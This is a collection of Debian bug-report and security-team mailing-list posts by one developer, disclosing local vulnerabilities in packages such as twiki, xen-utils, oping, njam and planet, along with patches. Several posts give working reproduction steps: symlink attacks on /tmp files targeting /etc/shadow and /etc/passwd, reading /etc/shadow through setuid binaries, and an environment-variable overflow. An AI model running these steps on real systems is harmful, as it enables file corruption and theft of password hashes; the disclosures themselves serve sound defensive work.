Bug#809252: node-cli: insecure use of temporary files

[Steve Kemp]

Package: node-cli
Version: 0.4.4~20120516-1
Severity: critical
Tags: security

Dear Maintainer,

The `node-cli` library makes insecure use of the following two
temporary files:

lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';

These allow overwriting files  that the starting-user has permission
to modify.



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Bug#808730: stalin: Insecure use of temporary files

[Steve Kemp]

Package: stalin
Version: 0.11-5
Severity: critical
Tags: security


When `stalin` launches it attempts to detect its environment via
the following code in /usr/lib/stalin/QobiScheme.sc:

   
(system "uname -m >/tmp/QobiScheme.tmp")
...
(system "rm -f /tmp/QobiScheme.tmp"))

This is a prime example of the insecure use of temporary files,
and allows overwriting any file owned by the user who invokes
stalin.

Trivial demonstration:


$ ln -s /home/steve/HACK /tmp/QobiScheme.tmp
$ ls -l /home/steve/HACK
ls: cannot access /home/steve/HACK: No such file or directory

Now run the sample code:


$ cd /tmp/stalin-0.11/benchmarks
$ ./make-hello

And we see this:

$ ls -l /home/steve/HACK
-rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK



-- System Information:
Debian Release: 8.2
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages stalin depends on:
ii  dpkg-dev   1.17.26
ii  libc6  2.19-18+deb8u1
ii  libgc-dev  1:7.2d-6.4

stalin recommends no packages.

stalin suggests no packages.

-- no debconf information


Steve
-- 

Bug#730189: ruby1.8: CVE-2013-4164

[Steve Kemp]

  The patches seem to work successfully for me:

  * The test-suite that runs at compile-time still passes.
 
  * The reproducer stops segfaulting.

  The reproducer I'm using is:

--
#!/usr/bin/ruby1.8
require 'json'
JSON.parse("[1."+"1"*30+"]")
--

Steve
-- 
http://www.steve.org.uk/

Bug#651896: Acknowledgement (njam: Insecure usage of environmental variable)

[Steve Kemp]

  Simple patch:

--- src/njam.cpp-orig   2011-12-13 17:06:04.0 +
+++ src/njam.cpp2011-12-13 17:07:08.0 +
@@ -339,7 +339,7 @@
sprintf(linux_sdl_driver, "x11\0");
char *driver_name = getenv("SDL_VIDEODRIVER");
if (driver_name)
-   sprintf(linux_sdl_driver, "%s\0", driver_name);
+   snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, "%s", 
driver_name);
 
if (UseDGA)
{



Steve
-- 
http://edinburgh-portraits.com/



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#651896: njam: Insecure usage of environmental variable

[Steve Kemp]

Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The setgid(games) binary /usr/games/njam makes insecure use of the 
environmental variable SDL_VIDEODRIVER.

This potentially allows the execution of arbitrary code, as the
following example shows:

1.  Setup the variable:

birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300") 


2.  Launch the binary under gdb so we can see what happens:

birthday:~# gdb /usr/games/njam
(gdb) run
Starting program: /usr/games/njam 
..
Program received signal SIGSEGV, Segmentation fault.
0x00404f48 in ?? ()
(gdb) bt
0  0x00404f48 in ?? ()
1  0x7878787878787878 in ?? ()
2  0x7878787878787878 in ?? ()
3  0x7878787878787878 in ?? ()

  0x78 == "x" == Code execution via overflow.


  This is probably a minor issue, but should be simple to patch.

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages njam depends on:
ii  libc62.11.2-10   Embedded GNU C Library: Shared lib
ii  libgcc1  1:4.4.5-8   GCC support library
ii  libsdl-image1.2  1.2.10-2+b2 image loading library for Simple D
ii  libsdl-mixer1.2  1.2.8-6.3   mixer library for Simple DirectMed
ii  libsdl-net1.21.2.7-2 network library for Simple DirectM
ii  libsdl1.2debian  1.2.14-6.1  Simple DirectMedia Layer
ii  libstdc++6   4.4.5-8 The GNU Standard C++ Library v3

njam recommends no packages.

njam suggests no packages.

-- no debconf information




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#553948: winkeydaemon: Symlink attack allows creation of arbitrary files

[Steve Kemp]

Package: winkeydaemon
Version: 1.0.1-3
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

  This is probably not a hugely exploitable issue, but reporting
 regardless:

 winkeydaemon.pl:

if (-d "/tmp/.winkey") {
# ok, no action required
} else {
my $dir = "/tmp/.winkey";
`mkdir "$dir"`;
if ($debug) {print "Arranging mutex directory\n";}
}
...
...
`touch /tmp/.winkey/keyer_busy`;
...
`rm /tmp/.winkey/keyer_busy`;
...


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages winkeydaemon depends on:
ii  libdevice-serialport-perl 1.04-2+b1  emulation of Win32::SerialPort for

winkeydaemon recommends no packages.

winkeydaemon suggests no packages.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#548684: oping allows reading arbitrary files upon the local system - security issue

[Steve Kemp]

Package: oping
Version: 1.3.2-1
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

 oping is setuid root and one of the command line arguments allows
 a configuration file to be specified.  This file is read and *reported*
 to the console.  (Unless the file contains contents which can be
 interpreted as a list of hostnames!)

 For example:

 s...@gold:~$ oping  -f /etc/shadow
 Adding host `root:$1eluded/value:14368:0:9:7:::' failed: getaddrinfo: Name 
or service not known
 Adding host `daemon:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `bin:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sys:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sync:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `games:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known

  This is clearly a security hole - however the good news is that the
 version(s) of oping included in lenny and etch are unaffected.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages oping depends on:
ii  libc6 2.9-26 GNU C Library: Shared libraries
ii  liboping0 1.3.2-1C/C++ library to generate ICMP ECH

oping recommends no packages.

oping suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

On Fri Sep 18, 2009 at 14:06:44 +0200, Arnaud Fontaine wrote:

> No I didn't, I could not find this discussion, could you please point it
> me out?   As soon as all these  issues will have been  addressed, I will
> prepare  a  package (debian-security  team:  please  do  not upload  the
> package for now).

 Basically it comes down to CDATA and the handling of 

 This is the comment I received:

--
 please find attached the two reproducers for the CDATA thing. poc1.xml
 is not correctly filtered while poc2.xml is filtered, although they are
 nearly identical.

 If you edit the newly patched function to print the k and v values,
 you'll see that the attributes aren't passed through.
--

Steve
--


poc1.xml
Description: XML document


poc2.xml
Description: XML document

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

On Fri Sep 18, 2009 at 13:38:39 +0200, Arnaud Fontaine wrote:

> I have prepared  yesterday a package for Lenny  including this patch. At
> the moment, I'm waiting for a reply from the debian-security team.

  Great.  Don't forget etch to.

> Thank you very much for the patch and bug report.

  Did you see the followup discussion from Secunia about another
 planet-problem, relating to the handling of CDATA ?

  (To be honest if I were to re-do the patch now I'd probably
 do it the other way round : Make sure "src"starts with http:
 to cover other cases too.)

Steve
--




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: Updated patch

[Steve Kemp]

  The patch doesn't account for case variations, so it shold be updated:

+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and 
(v.lower().find("javascript:" ) <> -1 ):
+del attrs[i]
+
 return attrs

Steve
--
http://www.steve.org.uk/



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

Subject: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The packages in Etch and Lenny are vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/etch/
+
 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used:

--- planet-2.0.orig/planet/sanitize.py
+++ planet-2.0/planet/sanitize.py
@@ -70,6 +70,12 @@
 # utility method to be called by descendants
 attrs = [(k.lower(), v) for k, v in attrs]
 attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in 
attrs]
+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and (v.find("javascript:" 
) <> -1 ):
+del attrs[i]
+
 return attrs

 def unknown_starttag(self, tag, attrs):


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546179: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

Subject: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet-venus
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The package in Lenny is vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used, written by upstream:

s...@senfl:~$ diff --unified scrub.orig scrub.py
--- scrub.orig  2009-09-09 16:24:50.0 +
+++ scrub.py2009-09-09 16:25:18.0 +
@@ -128,5 +128,13 @@
 node['value'] = feedparser._resolveRelativeURIs(
 node.value, node.base, 'utf-8', node.type)

-node['value'] = feedparser._sanitizeHTML(
-node.value, 'utf-8', node.type)
+# Run this through HTML5's serializer
+from html5lib import html5parser, sanitizer, treebuilders
+from html5lib import treewalkers, serializer
+p = html5parser.HTMLParser(tokenizer=sanitizer.HTMLSanitizer,
+  tree=treebuilders.getTreeBuilder('dom'))
+doc = p.parseFragment(node.value, encoding='utf-8')
+xhtml = serializer.XHTMLSerializer(inject_meta_charset = False)
+walker = treewalkers.getTreeWalker('dom')
+tree = xhtml.serialize(walker(doc), encoding='utf-8')
+node['value'] = ''.join([str(token) for token in tree])


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#518122: Acknowledgement (Security issue in mantis)

[Steve Kemp]

  Looks like I filed this too soon - the bug is fixed in Lenny's
 package already.

Steve
-- 



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#518122: Security issue in mantis

[Steve Kemp]

Package: mantis
Severity: grave
Tags: security
Version: 1.1.6+dfsg-2

  There's a security issue in the mantis version in lenny, at least,
 which allows registered users to run commands on the server.

  Details here:

http://secunia.com/advisories/32314/

  Patch here:


http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679&r2=5678&pathrev=5679

Steve
-- 
Stop blog&forum spam
http://blogspam.net/



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#509288: gnomad2: segfault on start up / vorbis comment headers

[Steve Kemp]

  The patch below my sig is sufficient to fix the bug.

  See here for more details:

http://blog.steve.org.uk/what_can_you_do__sparta_will_need_sons_.html

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/

s...@gold:/tmp$ diff --unified --ignore-space-change 
gnomad2-2.9.1/src/tagfile.c gnomad2-2.9.1.orig/src/tagfile.c
--- gnomad2-2.9.1/src/tagfile.c 2007-10-17 19:47:39.0 +0100
+++ gnomad2-2.9.1.orig/src/tagfile.c2008-12-22 22:25:18.0 +
@@ -59,9 +59,15 @@
 g_free(tmppath);
 return;  
   }
-  g_free(tmppath);
   
   tag = taglib_file_tag(file);
+  if ( tag == NULL ) {
+g_printf("tags were null in file %s", tmppath);
+g_free(tmppath);
+return;
+  }
+  g_free(tmppath);
+
   properties = taglib_file_audioproperties(file);
   
   gchar* artist = taglib_tag_artist(tag);




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

[Steve Kemp]

On Wed Aug 13, 2008 at 22:51:00 +1000, Sven Dowideit wrote:

> no, its got nothing to do with /var/lib/twiki/data etc, its the location
> for session data - produced by CGI::Session etc.

  Yes it does.
  
  The code we're talking about is contained in the file debian/postinst,
 and only executes under the following condition:

 # create initial htpasswd, if needed
 if [ -e /var/lib/twiki/data ]; then

...
...
#create securer-twiki session dir
mkdir ...

 fi

  My understanding of the discussion thus far is:

a.  This is a genuine bug.
b.  Which has been fixed.
c.  Except in Etch.

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#494648: The possibility of attack with the help of symlinks in some Debian packages

[Steve Kemp]

On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote:

> I will have to assume that this report is indeed incorrect unless I hear
> otherwise.

  On my Debian Etch system:

[EMAIL PROTECTED]:~$ apt-get source twiki
Reading package lists... Done
Building dependency tree... Done
Need to get 4304kB of source archives.
Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B]
Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB]
Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB]
Fetched 4304kB in 7s (546kB/s)
gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D
gpg: Can't check signature: public key not found
dpkg-source: extracting twiki in twiki-4.0.5
dpkg-source: unpacking twiki_4.0.5.orig.tar.gz
dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz

[EMAIL PROTECTED]:~$ cd twiki-4.0.5/
[EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst
if [ ! -e /tmp/twiki ]; then
mkdir /tmp/twiki
chmod 777 /tmp/twiki
chown $TWIKI_OWNER.www-data /tmp/twiki
[EMAIL PROTECTED]:~/twiki-4.0.5$


  So :

1.  If /tmp/twiki doesn't exist it is made as a directory.

2.  If it does exist its permissions are changed - unconditionally

  Let me exploit it:

[EMAIL PROTECTED]:~$
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo apt-get install twiki
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
  libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs
Suggested packages:
...
...
Setting up libtext-diff-perl (0.35-2) ...
Setting up rcs (5.7-18) ...
Setting up twiki (4.0.5-9.1) ...
Adding password for user TWikiGuest
Reloading web server config...3224

   Now what happened?

   Nothing.  The directory /tmp/twiki was created and my symlink wasn't
 touched.  So we look safe.  But I'm not convinced.

   I know that I can coerce it into working:

[EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki
[EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki
[EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure
Reloading web server config...3224
.
[EMAIL PROTECTED]:~$ ls -l /etc/shadow
-rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow

  I guess the difference is relating to the presence, or not, of 
 /var/lib/twiki/data ?

  Looks like merely installing the package wouldn't trigger this,
 but an upgrade might.  Or something like that !

Steve
--  




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#489756: poppler CVE-2008-2950 in etch

[Steve Kemp]

On Wed Jul 09, 2008 at 12:04:01 +0200, Wichert Akkerman wrote:
> I see CVE-2008-2960 reported in the BTS as #489756 but I see no mention  
> of a fix for stable. Is someone working on a DSA for stable?

  There isn't one in progress.  Tonight there will be a release of
 an update to handle CVE-2008-1693.  I guess that will be the next
 one.

Steve
-- 




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#480059: vorbis-tools vulnerable to CVE-2008-1686

[Steve Kemp]

On Wed May 07, 2008 at 18:12:09 -0400, Jamie Strandboge wrote:

> vorbis-tools contains embedded speex code, and although vorbis-tools is linked
> to libspeex, it compiles the vulnerable code. Attached is a debdiff that 
> Ubuntu
> is using in its 1.1.1 versions of vorbis-tools (fuzz removed).

  I'd rather see a patch that makes the vorbis-tools link
 against the system-wide library, and not compile the vulnerable
 code at all.

  Would it be possible for you to provide such a thing, or is that
 too hard?

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#464756: kazehakase security fix patch

[Steve Kemp]

On Tue Apr 15, 2008 at 21:36:13 -0400, Andres Salomon wrote:

> > Cool.  The package is here:
> > 
> > http://people.debian.org/~dilinger/security/kazehakase/etch/
> > 
> > I will give it a bit more testing later on tonight.

  Thanks.  I'll upload this tomorrow.  I assume this will
 be handled in the same way for Lenny / Sid?

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#464756: kazehakase security fix patch

[Steve Kemp]

On Tue Apr 15, 2008 at 15:46:02 -0400, Andres Salomon wrote:

> I'd rather see kaz linked against the system's pcre;
> it's much easier to deal w/.  Does the security team agree?

  Definitely!

Steve
-- 




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#475747: tss: Allows reading arbitary files

[Steve Kemp]

Package: tss
Version: 0.8.1-3
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  Due to poor permission checking the tss binary allows local
 users to read arbitrary files upon the system.

  For example the following reveals the contents of the
 /etc/shadow file:

[EMAIL PROTECTED]:~$ tss -a /etc/shadow

  The code *should* drop privileges prior to opening
 any files, or failing that should stat() the file to ensure
 the caller may view it.


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages tss depends on:
ii  libc6 2.7-10 GNU C Library: Shared libraries
ii  libncurses5   5.6+20080405-1 Shared libraries for terminal hand

tss recommends no packages.

-- no debconf information

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#468050: Security problems present in xwine

[Steve Kemp]

Package: xwine
Version: 1.0.1-1.1
Severity: grave
Justification: user security hole
Tags: security

*** Please type your report below this line ***

  I'd urge for the removal of this package from Lenny/Sid because
 of bug 460783 + this one...

  xwine contains two flaws:

   1.  Insecure use of temporary files.
   2.  Broken permissions on /etc/wine/config

  Printing uses the static file '/tmp/temporaire' for spooling into
 with no sanity checks, then this:
  ./w_editeur.c:  system("cat /tmp/temporaire | lp &");
  ./w_editeur.c:  system("rm -f /tmp/temporaire");

  The second issue is more interesting.  The global wine configuration
 file is abused thusly:

 ./w_export.c:  system("cp -f ~/.wine/config /etc/wine/");
 ./w_export.c:  system("chmod 666 /etc/wine/config");

  I guess for this to work the program must be started by root,
 but if the permissions are 0666 then any user may edit the file
 and cause DOS for local users.  I'm not horribly familiar with
 Window configuration, but it does seem like you could cause
 arbitrary code to run when a local user invokes wine, and prints,
 via a configuration file like this:

 /etc/wine/config:
 [spooler]
 "FILE:" = "tmp.ps"
 "LPT1:" = "|/tmp/bogus-spooler.lpr"

  Mitigating circumstances are that these days Wine ignores
 /etc/wine/config & ~/.wine/config.  Instead this information
 is stored in the wine registry which actually renders this package
 pointless for etch+

Steve
-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#464058: [horde-vendor] Bug#464058: turba access checking issue

[Steve Kemp]

On Thu Feb 21, 2008 at 02:41:41 +0100, Gregory Colpart wrote:

> The package turba2 has vulnerabilities (See CVE-2008-0807, bug
> #464058 and changelogs of fixed sarge/etch packages).

  A shining example of how to handle security updates. Thanks very
 very much for the fixed packages, and the clear writeup.

  I"ll upload them today, and handle the release when they are
 done.

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#452518: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

[Steve Kemp]

On Fri Nov 23, 2007 at 12:25:42 +, Domijor wrote:

>Today I updated with aptitude the package "samba" to the version
>"samba_3.0.24-6etch5_i386.deb". I have PDC server with Samba. The cliente
>don't connect
>to server. The cliente connect with "smbfs". The log of system is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
 here:

  http://people.debian.org/~vorlon/samba/

Steve
-- 




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#452515: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb

[Steve Kemp]

On Fri Nov 23, 2007 at 12:02:59 +, Error update 
samba_3.0.24-6etch5_i386.deb wrote:

> Today I updated with aptitude the package "samba" to the version 
> "samba_3.0.24-6etch5_i386.deb". I have PDC server with Samba. The cliente 
> don't connect 
> to server. The cliente connect with "smbfs". The log of system is:

  The package introduced a regression affecting some users.
  An update is pending, in the meantime you can find fixed packages
  here:

http://people.debian.org/~vorlon/samba/

Steve
-- 




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#446354: OpenBSD patch for CVE-2007-5365 is insufficient

[Steve Kemp]

On Mon Oct 29, 2007 at 19:33:17 +0100, Tomas Hoger wrote:

> During testing of our updated dhcp packages, we have found out that
> patch for CVE-2007-5365 used by OpenBSD was not sufficient and it was
> still possible to crash dhcpd.  Your dhcp packages released in DSA
> 1388-1 also seem affected. You can find better patch based on dhcp-3.x
> code here:
> 
>   https://bugzilla.redhat.com/show_bug.cgi?id=327781#c5
> 
> Note: [EMAIL PROTECTED] was notified on 2007-10-23.
> Updated DSA 1388-3 released on 2007-10-29.

  Thanks, we have a built package already.  I'm not sure who is
  releasing it - I guess I should since I did the previous one.
  I'll chase it tomorrow/wednesday.

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#447795: xen-utils-3.0.3-1: [CVE-2007-3919] xenmon.py / xenbaked insecure file accesss

[Steve Kemp]

Package: xen-utils-3.0.3-1
Version: 3.0.3-0-3
Severity: grave
Tags: security
Justification: user security hole


  Xen versions 3.x, and 3.1 contain a tool for processing Xen trace
 buffer information.

  This tool uses the static file /tmp/xenq-shm insecurely allowing
 a local user to truncate any local file when xenbaked or xenmon.py
 are invoked by root.

  Sample session:

# setup.
[EMAIL PROTECTED]:~$ ln -s /etc/passwd /tmp/xenq-shm

# later.
[EMAIL PROTECTED]:~$ sudo xenbaked

# all gone.  :(
[EMAIL PROTECTED]:~$ ls -l /etc/passwd
-rw-r--r-- 1 0 root 327680 2007-10-17 00:14 /etc/passwd

  This flaw is known as CVE-2007-3919 by the common vulnerabilities
 and exposures project.

  As the filename needs to be shared between xenmon.py + xenbaked.c
 a "random" one cannot easily be generated.  The solution that 
 Debian will use for its security update is to create the file in
 a location which is only writable by root - /var/run.

  Security advisory will be released very soon.

Steve
-- 
-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-xen-amd64
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)

Versions of packages xen-utils-3.0.3-1 depends on:
ii  iproute20061002-3Professional tools to control the 
ii  libc6  2.3.6.ds1-13etch2 GNU C Library: Shared libraries
ii  libncurses55.5-5 Shared libraries for terminal hand
ii  python 2.4.4-2   An interactive high-level object-o
ii  python-central 0.5.12register and build utility for Pyt
ii  udev   0.105-4   /dev/ and hotplug management daemo
ii  xen-utils-common   3.0.3-0-2 XEN administrative tools - common 
ii  zlib1g 1:1.2.3-13compression library - runtime

Versions of packages xen-utils-3.0.3-1 recommends:
ii  bridge-utils  1.2-1  Utilities for configuring the Linu
ii  xen-hypervisor-3.0.3-1-amd64  3.0.3-0-3  The Xen Hypervisor on AMD64

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#446354: dhcp: stack-based buffer overflow (CVE-2007-5365)

[Steve Kemp]

On Fri Oct 12, 2007 at 22:51:24 +1000, Steffen Joeris wrote:

> A patch is attached below. Please tell me, if you want to take care of
> it or if i should upload.

  Thanks for the patch, I will upload with it.

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#441555: lighttpd: header overflow when using the mod_fastcgi extension

[Steve Kemp]

On Mon Sep 10, 2007 at 13:41:10 +0200, Stefan Andersson wrote:
> Package: lighttpd
> Version: 1.4.13-4etch1
> Severity: critical
> Tags: security
> Justification: arbitrary code execution

  Fixed already in DSA-1362.


Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#436701: CVE-2007-1614: DoS and execution of arbitary code

[Steve Kemp]

On Thu Aug 09, 2007 at 01:07:47 +1000, Steffen Joeris wrote:
> Package: zziplib
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> Hi
> 
> The following CVE[0] has be issued against zziplib.

